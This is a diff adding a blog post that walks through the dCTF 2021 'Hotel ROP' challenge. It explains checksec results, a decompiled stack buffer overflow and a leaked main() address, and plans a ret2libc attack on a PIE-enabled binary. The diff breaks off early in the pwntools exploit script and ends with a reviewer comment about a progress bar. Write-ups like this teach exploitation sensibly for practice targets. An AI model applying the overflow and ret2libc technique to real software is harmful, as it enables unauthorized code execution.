content/posts/dctf-2021-hotel-rop-ret2libc-pie.md

```diff
@@ -0,0 +1,282 @@
+---
+title: "dCTF 2021 - Hotel ROP"
+date: 2021-05-24T20:22:21-05:00
+draft: false
+subtitle: "Returning 2 LIBC in a PIE enabled binary"
+tags: ["pie", "aslr", "easy", "elf", "libc"]
+author: "<a href='https://caprinux.github.io'>elma</a>"
+---
+Today, we will be looking at a pwn challenge from **dCTF 2021** which features ret2libc exploitation with a little twist of a `PIE-enabled` binary. The following PwnTools features will be introduced here:
+- `pwnlib.rop` to help us craft ROP chains
+- `pwnlib.elf` to make finding addresses quick and easy
+- and many more little modules from `pwntools` to help us pwn faster ~
+
+<br>
+
+## Challenge Description
+---
+> They say programmers' dream is California. And because they need somewhere to stay, we've built a hotel!
+>
+> Attachments: [hotel_rop](/content/files/hotel_rop)
+
+<br>
+
+## Getting Started
+---
+
+For this challenge, we are provided with a binary and nothing else.
+
+We quickly check the security features of the binary with `checksec hotel_rop` which returns
+
+```
+[*] '/media/sf_dabian/Challenges/dctf/pwn/hotel_rop'
+
+    Arch:     amd64-64-little
+    RELRO:    Partial RELRO
+    Stack:    No canary found
+    NX:       NX enabled
+    PIE:      PIE enabled
+```
+
+As shown, `PIE` and `NX` is enabled. Let's run the binary and check out what we are dealing with
+
+```
+➜ ./hotel_rop
+Welcome to Hotel ROP, on main street 0x55e4cd29636d
+You come here often?
+test
+I think you should come here more often.
+```
+
+As you can see, we are given a leak and an input. Let's decompile and look at what's going on behind the scenes.
+
+```c
+int main()
+{
+  alarm(0xAu);
+  printf("Welcome to Hotel ROP, on main street %p\n", main);
+  vuln();
+  return 0;
+}
+
+int vuln()
+{
+  int result;
+  char s[28];
+  int v2;
+
+  puts("You come here often?");
+  fgets(s, 256, stdin);
+  if ( v2 )
+    result = puts("I think you should come here more often.");
+  else
+    result = puts("Oh! You are already a regular visitor!");
+  return result;
+}
+
+```
+
+As you can see, we have a leak which points to `main()`, and we have a **buffer overflow** in `vuln()` as we are given **256 bytes of input** into a variable that holds **28 bytes of data**.
+
+With this, it becomes rather apparent that we have to do a `ret2libc` in order to spawn a shell and win. However, since this binary is `PIE` enabled, we have to first calculate the `PIE` base.
+
+<br>
+
+## Exploitation
+---
+
+### Stage 1: Calculate PIE base
+
+Since we know that our leak is the address of `main()`, we can easily calculate our offset with `elf.sym.main` and set it as the base_address by saving it to `elf.address`.
+
+```py
+from pwn import *
+
+p = process('./hotel_rop') # run the process
+context.binary = elf = ELF('hotel_rop') # set elf and context
+libc = elf.libc # set libc
+
+with log.progress('Calculating PIE base'): # cool loading bar !

```

Comment:
While neat, we probably don't need a progress bar for this unless it takes a long time